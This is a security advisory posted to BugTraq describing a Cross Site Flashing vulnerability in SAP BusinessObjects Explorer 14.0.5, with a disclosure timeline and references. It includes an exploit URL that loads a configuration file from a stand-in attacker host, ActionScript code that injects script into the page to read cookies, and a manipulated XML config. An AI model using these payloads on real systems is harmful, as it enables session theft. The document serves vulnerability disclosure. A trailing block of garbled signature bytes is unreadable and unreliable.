BugTraq
SAP Security Note 1908647 - Cross Site Flashing in BusinessObjects Explorer Oct 10 2014 05:37AM
Alexandre Herzog (alexandre herzog csnc ch)
#######################################################################
#
# COMPASS SECURITY ADVISORY
# http://www.csnc.ch/en/downloads/advisories.html
#
#######################################################################
#
# Product: BusinessObjects Explorer
# Vendor: SAP AG
# Subject: Cross Site Flashing
# Risk: High
# Effect: Remotely exploitable
# Author: Stefan Horlacher
# Date: 2014-10-10
# SAP Security Note: 1908647 [0]
#
#######################################################################

Abstract:
-------------
BusinessObjects Explorer is vulnerable against Cross Site Flashing [1]
attacks, allowing an attacker to e.g. steal the victim's session.
This vulnerability requires the victim to click on a malicious link
prepared by the attacker.

Affected:
---------
Vulnerable:
SAP BusinessObjects Explorer version 14.0.5 (build 882)

Not tested:
Other versions of BusinessObjects Explorer

Technical Description:
----------------------
The Flash file suffers from a Cross Site Flashing vulnerability. It
is possible to directly load and display the
com_businessobjects_polestar_bootstrap.swf Flash file and specify a
configUrl. This requires the victim to be logged and the attacker needs
to know the /webres/ URL, which is known as soon as the attacker is in
possession of valid credentials. The configuration file specified in
the configURL parameter may reside on a foreign host. The
configuration file itself may contain URLs of further Flash files
residing on a foreign domain. If successful, the victim loads foreign
Flash files, which leads to Cross Site Flashing. The example below
loads a Flash file, which injects JavaScript into the DOM of the
originating domain.

URL: /explorer/webres/[CUT BY COMPASS]/com_businessobjects_polestar_bootstrap.swf?configUrl=http://exa
mple.com/attacker_flash_config.xml

Code of the injected Flash file referenced in http://example.com/attacker_flash_config.xml
package
{
import flash.display.Sprite;
import flash.events.Event;
import flash.external.ExternalInterface;

public class Main extends Sprite
{
public function Main():void
{
ExternalInterface.call("document.write",
"<script>alert(document.cookie)</script>");
}
}
}

Extract of the manipulated configuration file http://example.com/attacker_flash_config.xml:
<p:configuration xmlns:p="http://www.businessobjects.com/2007/platform"
p:codebase="plugins/">
<p:splashLocation p:id="com_businessobjects_polestar_splashscreen"
p:codebase="http://[CUT BY COMPASS].csnc.ch/[CUT BY COMPASS]/"/>
<p:bundles>
<p:bundle p:id="com_businessobjects_polestar_admin" p:codebase="http://example.com/"/>
<p:bundle p:id="com_businessobjects_polestar_prompts" p:codebase="http://example.com/"/>
<p:bundle p:id="com_businessobjects_polestar_dataprovider_xl" p:codebase="http://example.com/"/>
<p:bundle p:id="com_businessobjects_polestar_portal_logoff" p:codebase="http://example.com/"/>
[CUT BY COMPASS]

Timeline:
---------
2013-06-06: Discovery by Stefan Horlacher
2013-06-26: Initial vendor notification
2013-12-10: Vendor releases patch and SAP Security Note 1908647
2014-10-10: Disclosure of the advisory

References:
-----------
[0] https://service.sap.com/sap/support/notes/1908647
[1] https://www.owasp.org/index.php/Category:OWASP_Flash_Security_Project
0?n *?H?÷
 ?_0?[1 0 +0  *?H?÷
 ?+0?û0?ã }i>Y-sR⧭[³è30
 *?H?÷
0U1 0 UCH10U
 SwissSign AG1/0-U&SwissSign Personal Silver CA 2008 - G20
120820133715Z
150820133715Z0I10U Email Validated Only1(0&UEmail: alexandre.herzog (at) csnc (dot) ch0 [email concealed]?"0
 *?H?÷
?0?
?º?G?´Æ]ÿº?Ô­{R7?w9ú ®B6¯býÆ6%MæGWbSе¾"ìÇ/SèÕö6
bJa*ù¥'¬ÃVp·#<yù?vþWIît±ÒOÏsÐá
Ѿ«ÂmDï(Ä19?ùýf[
¥,´þªÝÚ8¥( äò?ÔÛ¥ÌÙUõvm«/|ލùÐ?ô]?¼au¿rÅ1???puíÓT|??eÿïgü4ZØÑ?GeD?í?4??]ú?¹YË?
]Ùh 2?£õ!7æÜ?ä Idô¾d=?ÿ¤â²q$R|oÿmÛï]ßEÍI?»ý}?£?Ò0?Î0Uÿ°0U%
 0
+0Uâͪö*WéÚÿÂ$Ò"?'Iu0U#0?ë5±Vm`Xôá"ÍF®Ð
e0ÿU÷0ô0G E C?Ahttp://crl.swisssign.net/EB35B1566D156058F4E122CD
1C461CAED00400650¨ ¥ ¢??ldap://directory.swisssign.net/CN=EB35B1566D
156058F4E122CD1C461CAED0040065%2CO=SwissSign%2CC=CH?certificateRevocatio
nList?base?objectClass=cRLDistributionPoint0dU ]0[0Y `?tY0L0J+>http://repository.swisssign.com/SwissSign-Silve
r-CP-CPS-R4.pdf0Ù+Ì0É0d+0?Xhttp://swisssign.net/cgi
-bin/authority/download/EB35B1566D156058F4E122CD1C461CAED00400650a+
0?Uhttp://silver-personal-g2.ocsp.swisssign.net/EB35B1566D156058F4E12
2CD1C461CAED00400650#U0alexandre.herzog (at) csnc (dot) ch0 [email concealed]
 *?H?÷
?eà?ÞÁU©þO¿ÇJ
à;.¬~"³²`??pÍ?{î?|YûÆ¢ýÓ?o¸òäÖ;`AW©º?C?S6?¡¤xïÞz}ñ¯9èa£luÆ@?^
?¾Þu¢~p¶É
*Þ©ìÙ?ÇÌQ?h·)Z`*?'R{Ý?PT0???í&°·¹?+ô?I¦3ËÇÍ¿jL cO$³\r\} EÀÃ@"ÁãUÎd9ø
²ZÍÜ2µf΍ã§8ÐA§?ÅúTã??ÊU à??æ??­??+P?(¥J@P}«??_*±¢?,8?Ôݐ¹+*y?Z0?g0?O  âV·S?kvX0
 *?H?÷
0G1 0 UCH10U
 SwissSign AG1!0USwissSign Silver CA - G20
080709111109Z
230709111109Z0U1 0 UCH10U
 SwissSign AG1/0-U&SwissSign Personal Silver CA 2008 - G20?"0
 *?H?÷
?0?
?÷óS^Im?å'!`¥v??¸!@Ï63¬*r?aÃkÞzIX=?Ø;ðA¿kV³=¿cº1~ârFh?
×?O É{©Ð9Ñ?Ö5ghvÁ_? ÍÏ:Ñ?
ÚòCò¤¢¬?u è÷4§¿¶æ9hfRG9)M´è*­a´¢1à?ÛäCñ+ÞÁ4Ël?îb'DØ1ñß<!ÌÀ¬h
ÓthÉJ?; §±e¤®.zÞzDo°þtÿ?õXé¦%ñÌ?"'ØË1Á/( qr÷ûNnz¬!?
Zfø¿åù?Ä?º3
??]®¡£?F0?B0Uÿ0Uÿ0ÿ0Uë5±Vm
`Xôá"ÍF®Ðe0U#0? ÍÁäA¶:[;ËE½Â?ú?X0ÿU÷0ô0G E C?Ahttp
://crl.swisssign.net/17A0CDC1E441B63A5B3BCB459DBD1CC298FA86580¨ ¥ ¢?
?ldap://directory.swisssign.net/CN=17A0CDC1E441B63A5B3BCB459DBD1CC298FA8
658%2CO=SwissSign%2CC=CH?certificateRevocationList?base?objectClass=cRLD
istributionPoint0dU ]0[0Y `?tY0L0J+>http://repository.swisssign.com/SwissSign-Silve
r-CP-CPS-R3.pdf0t+h0f0d+0?Xhttp://swisssign.net/cgi-bi
n/authority/download/17A0CDC1E441B63A5B3BCB459DBD1CC298FA86580
 *?H?÷
?.*vÚ?óLßd'á[-?ï¹U.Û¸ e1@°K½|±ÙØqSÎè5,?ºt?ÔW?ÀW??P%{à?Ô]¸Dxé3Aþá¿F?y}r¼8PÀhZ²ÓÞ]gÏi?ø
õ¬ ?ÔÝZ.j9#ïôïsZ6Ãé Gd79y×P²¬º?ê?äEF¾Í/9?
?ðU²&$Q³kÑ|i=XՁ5<hGWÆ³Ï*jE/?©N=Á9ÊëûÞJ?­¸a? ¸?#´vC?®?8^Ò8õ?Ù Õ.øÉ??§ ³Ò(]#lNfñ?c ÜbÄGâr¢àm~=]?E?h?¥ðõíÛ??Îé¦?Úßn5Ú`ö°G?4å¼`´ÀÀ(ôn<¹ú
I?:e8´µa??!ï??Åu(5«^R`/:ï1?¦{÷H p<µ×bË´BÃô¸Dq?$ü×î?!èªc?ÃÏ[òÒ?p'TÌî¡Ñ "?^Ð?C9ªRNgÚ2¼Z??Ú6«Szôwêü×èÞê?ÆnPDàÏ0Ê??¡ §ü¹èÅ-ósõTþ(א##)OI3y
?J^a?f]Ñ?o?.![eDÍvIò¥ƶ~?¢6£)¡x«$]ð
t

y?aHUÞF¹¹Ûª?0?½0?¥ OÔ/T»/K0
 *?H?÷
0G1 0 UCH10U
 SwissSign AG1!0USwissSign Silver CA - G20
061025083246Z
361025083246Z0G1 0 UCH10U
 SwissSign AG1!0USwissSign Silver CA - G20?"0
 *?H?÷
?0?
?Äñ?Óx1÷8ÉøÃ?C¼Ç÷¼7çNqºK¥s\n?®W®87C/=ÈÎhÁx®+ú,y?öè¹h¹UòD§9
ùü?ñ¢M'ùa{º·å¢¶ëa>ÐlÑæûú^í´? 5[¡?ËðI?þ?
>æÙ âO»Ü?7ü?é25"Ñ:N'?°?2Úa
GM`B®?Gè?ZPXé??¹]¡ÜÝ?J6g»Hä?¶7ëH:¯gèÊïj1?ÔÀ¶ù?q{gd¸¶?JB{e.0j õî?æòÍ?ìÙ¡Jìö²KåE?æmx?.??m6©Ä1d?? *ô5
xÉUÏA°Gé0??¾a¨?¹(z_8Ù©8°?sÁÃ;H*?!?¸Ì¨5Ã??³>¾¤?i:?xÙÉô?«V~[??9?¤
, 2?`³?À*¶ ~IòJùÕF/?£?§&¬»?<æ¼GÜsQñpd/ù´G0lDê)7??hf¼?8þ{9.ÓPðû^
`¶©¦ú'Añ?ròõ?tJÉgÄT®Hdß?Ñn°á??qéLØ¥÷GtÑQ??ó¢#@ sÛK¦çs?Á éÁY¬Fú
æ/øÏq?Fm¹Ä8yEHïÄ]×î?9"?²
XC÷q©H.ýêÖ£¬0©0Uÿ0Uÿ0ÿ0U ÍÁäA
¶:[;ËE½Â?ú?X0U#0? ÍÁäA¶:[;ËE½Â?ú?X0FU ?0=0; `?tY0.0,+ http://repository.swisssign.com/0
 *?H?÷
?sƁà'Ò-à?0â?AP,__ba©?ji tIÖ]?êARoX­PV jƽ(iX?Ü?5©:¼¥`?ØE?iÙ~»xrÁ*Ώ?pa¬ Í ¸9)V?2N?»=Ä*Ù×rîþQ¡"A±qc?°
b«^WßËÝu À]y?àPæÞ1þ?{p_¥Ø­ø¶oÓ`Ý@K"Å=­:z?G?y3º?Ü2i?nKðqþãgr ±¿
\?äú?"Ç?¹#??í%àÏe»õaïݲZA"Z¡?],è[Ém© xª`ÆVZ h¼iyÄ~?¿Åé$Q^ÔÕKSíÙ#Z6e£Á­A0óF?¯eµÕ±ä[xu?zmY©*{ÞÃ???IsxÈ=½Q5t
*Õñ~i*»;½%¸?Z=raf?î ÖMÔt jþ ü£UW?þJË®[Èò#1S8Ò-j??¹j÷^AtnÃ~¬)`??8ÊW
½0/Ç¥æA Ú®?? ¤elL ?º¸Ó¹À??0úå?kNgªÚbV>?fÒÄ6}§>ü?àÔ?彪óN£zjùbrã Oë?#ñ?»|ÜÜl?%²ò´cÒ*g??õÎêØ?jìä
»*Lë `9ÎÊbØ.n1? 0?0h0U1 0 UCH10U
 SwissSign AG1/0-U&SwissSign Personal Silver CA 2008 - G2}i>Y-sR⧭[³è30 + z0# *?H?÷
 1a7D¯  h7Êtô.R}k{âEÿ0 *?H?÷
 1  *?H?÷
0 *?H?÷
 1
141010053719Z0 *?H?÷
 10 0
*?H?÷
0
 *?H?÷
??iè5¥ï(ÓGO_Ë?v?è³f?o¬ìb°¹ë|½ãµyÙtãi?ÇE|A{O×ÙÂÃÖwÆf» \ÙÙù¶°KYÍ
EÒb¦?ܤ"Ø?yÉw¬¾×°¸å>8§Í8!­Þ?'´â×üã? ®F»É"p?®??×û`yɽZè?? P? ÚaË` t<-ÄF:?suZ ò§(Å?ËðP©¼9j$Kø?W4
">ÊÖm«eMËþ$Hþ¿áðJnÁ-y ü±¥>坶Ò) UFX?Ò¹k93I?V2ò% >ÒÙ¦{a$?´´?=÷á­À?ªP?yäþklr¤å

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus